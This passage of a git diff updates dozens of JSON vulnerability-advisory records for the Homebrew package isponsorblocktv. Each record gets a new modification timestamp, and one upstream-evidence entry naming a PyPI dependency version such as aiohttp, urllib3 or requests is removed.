"ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2023-49082.json b/advisories/BREW-isponsorblocktv-CVE-2023-49082.json index 3328ff3a6fb..1e5db34fa34 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2023-49082.json +++ b/advisories/BREW-isponsorblocktv-CVE-2023-49082.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2023-49082", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-qvrw-v9rv-5rjx", "CVE-2023-49082", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2024-23334.json b/advisories/BREW-isponsorblocktv-CVE-2024-23334.json index 1627c558be4..ade42db4cd7 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2024-23334.json +++ b/advisories/BREW-isponsorblocktv-CVE-2024-23334.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2024-23334", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:52:51Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-5h86-8mv2-jq9f", "CVE-2024-23334", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2024-23829.json b/advisories/BREW-isponsorblocktv-CVE-2024-23829.json index b32197d1fd8..324e61a34ce 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2024-23829.json +++ b/advisories/BREW-isponsorblocktv-CVE-2024-23829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2024-23829", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:52:51Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-8qpw-xqxj-h4r2", "CVE-2024-23829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2024-27306.json b/advisories/BREW-isponsorblocktv-CVE-2024-27306.json index 00d6eb337c3..7ed9e887abf 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2024-27306.json +++ b/advisories/BREW-isponsorblocktv-CVE-2024-27306.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2024-27306", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:52:51Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-7gpw-8wmc-pm8g", "CVE-2024-27306", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2024-30251.json b/advisories/BREW-isponsorblocktv-CVE-2024-30251.json index e615fc38a4d..a0082759eb5 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2024-30251.json +++ b/advisories/BREW-isponsorblocktv-CVE-2024-30251.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2024-30251", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:52:51Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-5m98-qgg9-wh84", "CVE-2024-30251", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2024-35195.json b/advisories/BREW-isponsorblocktv-CVE-2024-35195.json index 1876eab92b3..e33e71134b2 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2024-35195.json +++ b/advisories/BREW-isponsorblocktv-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2024-35195", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2024-3651.json b/advisories/BREW-isponsorblocktv-CVE-2024-3651.json index f63527bfea5..a542a1336de 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2024-3651.json +++ b/advisories/BREW-isponsorblocktv-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2024-3651", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2024-37891.json b/advisories/BREW-isponsorblocktv-CVE-2024-37891.json index 6598f22994a..dbd6cf2a6ee 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2024-37891.json +++ b/advisories/BREW-isponsorblocktv-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2024-37891", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2024-42367.json b/advisories/BREW-isponsorblocktv-CVE-2024-42367.json index 8a15c06ce5b..1f293f34d21 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2024-42367.json +++ b/advisories/BREW-isponsorblocktv-CVE-2024-42367.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2024-42367", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-jwhx-xcg6-8xhj", "CVE-2024-42367", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2024-47081.json b/advisories/BREW-isponsorblocktv-CVE-2024-47081.json index 9d09662d6a3..2443dc0af59 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2024-47081.json +++ b/advisories/BREW-isponsorblocktv-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2024-47081", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2024-52303.json b/advisories/BREW-isponsorblocktv-CVE-2024-52303.json index 5dd70f63d98..98018433699 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2024-52303.json +++ b/advisories/BREW-isponsorblocktv-CVE-2024-52303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2024-52303", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:52:51Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-27mf-ghqm-j3j8", "CVE-2024-52303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2024-52304.json b/advisories/BREW-isponsorblocktv-CVE-2024-52304.json index dcb34e3ae5d..35e520d1cb4 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2024-52304.json +++ b/advisories/BREW-isponsorblocktv-CVE-2024-52304.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2024-52304", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:52:51Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-8495-4g3g-x7pr", "CVE-2024-52304", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2025-4565.json b/advisories/BREW-isponsorblocktv-CVE-2025-4565.json index e74e2af88d3..ad849d12e44 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2025-4565.json +++ b/advisories/BREW-isponsorblocktv-CVE-2025-4565.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2025-4565", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-8qvm-5x2c-j2w7", "CVE-2025-4565", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "7.36.0", - "key": "pkg:pypi/protobuf@7.36.0", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2025-50181.json b/advisories/BREW-isponsorblocktv-CVE-2025-50181.json index 69055b0e609..c6bd8e62c96 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2025-50181.json +++ b/advisories/BREW-isponsorblocktv-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2025-50181", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2025-50182.json b/advisories/BREW-isponsorblocktv-CVE-2025-50182.json index 154bee726a3..df452271b32 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2025-50182.json +++ b/advisories/BREW-isponsorblocktv-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2025-50182", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2025-53643.json b/advisories/BREW-isponsorblocktv-CVE-2025-53643.json index 13e08c1cd07..91dce97c7d5 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2025-53643.json +++ b/advisories/BREW-isponsorblocktv-CVE-2025-53643.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2025-53643", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:52:51Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-9548-qrrj-x5pj", "CVE-2025-53643", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2025-66418.json b/advisories/BREW-isponsorblocktv-CVE-2025-66418.json index e6e5e5c460c..3b126a3c768 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2025-66418.json +++ b/advisories/BREW-isponsorblocktv-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2025-66418", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2025-66471.json b/advisories/BREW-isponsorblocktv-CVE-2025-66471.json index cbda7abf6a6..16e22b405a9 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2025-66471.json +++ b/advisories/BREW-isponsorblocktv-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2025-66471", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2025-69223.json b/advisories/BREW-isponsorblocktv-CVE-2025-69223.json index 1b7eb89f805..a38138f0b7a 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2025-69223.json +++ b/advisories/BREW-isponsorblocktv-CVE-2025-69223.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2025-69223", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:52:51Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-6mq8-rvhq-8wgg", "CVE-2025-69223", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2025-69224.json b/advisories/BREW-isponsorblocktv-CVE-2025-69224.json index 383849ee364..f4176b0574d 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2025-69224.json +++ b/advisories/BREW-isponsorblocktv-CVE-2025-69224.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2025-69224", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:52:51Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-69f9-5gxw-wvc2", "CVE-2025-69224", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2025-69225.json b/advisories/BREW-isponsorblocktv-CVE-2025-69225.json index 7563f0d915b..928a92a8557 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2025-69225.json +++ b/advisories/BREW-isponsorblocktv-CVE-2025-69225.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2025-69225", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-mqqc-3gqh-h2x8", "CVE-2025-69225", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2025-69226.json b/advisories/BREW-isponsorblocktv-CVE-2025-69226.json index e43dd2131e2..56d2b84b14d 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2025-69226.json +++ b/advisories/BREW-isponsorblocktv-CVE-2025-69226.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2025-69226", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:52:51Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-54jq-c3m8-4m76", "CVE-2025-69226", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2025-69227.json b/advisories/BREW-isponsorblocktv-CVE-2025-69227.json index 6b3c13dfdc6..23e375ee0fb 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2025-69227.json +++ b/advisories/BREW-isponsorblocktv-CVE-2025-69227.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2025-69227", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-jj3x-wxrx-4x23", "CVE-2025-69227", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2025-69228.json b/advisories/BREW-isponsorblocktv-CVE-2025-69228.json index e1a5d8af2bf..a1f151ce704 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2025-69228.json +++ b/advisories/BREW-isponsorblocktv-CVE-2025-69228.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2025-69228", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:52:51Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-6jhg-hg63-jvvf", "CVE-2025-69228", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2025-69229.json b/advisories/BREW-isponsorblocktv-CVE-2025-69229.json index cf6816c32dc..ab3c93e4028 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2025-69229.json +++ b/advisories/BREW-isponsorblocktv-CVE-2025-69229.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2025-69229", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-g84x-mcqj-x9qq", "CVE-2025-69229", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2025-69230.json b/advisories/BREW-isponsorblocktv-CVE-2025-69230.json index beab17939b1..6293e11d20b 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2025-69230.json +++ b/advisories/BREW-isponsorblocktv-CVE-2025-69230.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2025-69230", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-fh55-r93g-j68g", "CVE-2025-69230", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-0994.json b/advisories/BREW-isponsorblocktv-CVE-2026-0994.json index c842e71b8e2..d0d868838b0 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-0994.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-0994.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-0994", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-7gcm-g887-7qv7", "CVE-2026-0994", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "7.36.0", - "key": "pkg:pypi/protobuf@7.36.0", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-21441.json b/advisories/BREW-isponsorblocktv-CVE-2026-21441.json index bb76932aeba..a6fb2352c8c 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-21441.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-21441", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-22815.json b/advisories/BREW-isponsorblocktv-CVE-2026-22815.json index 91f25caf317..c63efc04474 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-22815.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-22815.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-22815", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-w2fm-2cpv-w7v5", "CVE-2026-22815", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-25645.json b/advisories/BREW-isponsorblocktv-CVE-2026-25645.json index 6ab94c44ae3..2ab9c8e3a12 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-25645.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-25645", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-13T17:00:03Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-34513.json b/advisories/BREW-isponsorblocktv-CVE-2026-34513.json index d791238255f..adcc17218c8 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-34513.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-34513.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-34513", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:53:54Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-hcc4-c3v8-rx92", "CVE-2026-34513", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-34514.json b/advisories/BREW-isponsorblocktv-CVE-2026-34514.json index c3c44b7c451..0d77b99fd3d 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-34514.json +++ b/advisories/BREW-isponsorblocktv-CVE-2026-34514.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-isponsorblocktv-CVE-2026-34514", "published": "2026-08-13T17:00:03Z", - "modified": "2026-08-23T20:52:51Z", + "modified": "2026-09-10T19:32:54Z", "upstream": [ "GHSA-2vrm-gr82-f7m5", "CVE-2026-34514", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-isponsorblocktv-CVE-2026-34515.json b/advisories/BREW-isponsorblocktv-CVE-2026-34515.json index 8b385da180a..2f927b14f67 100644 --- a/advisories/BREW-isponsorblocktv-CVE-2026-34515.json +++ 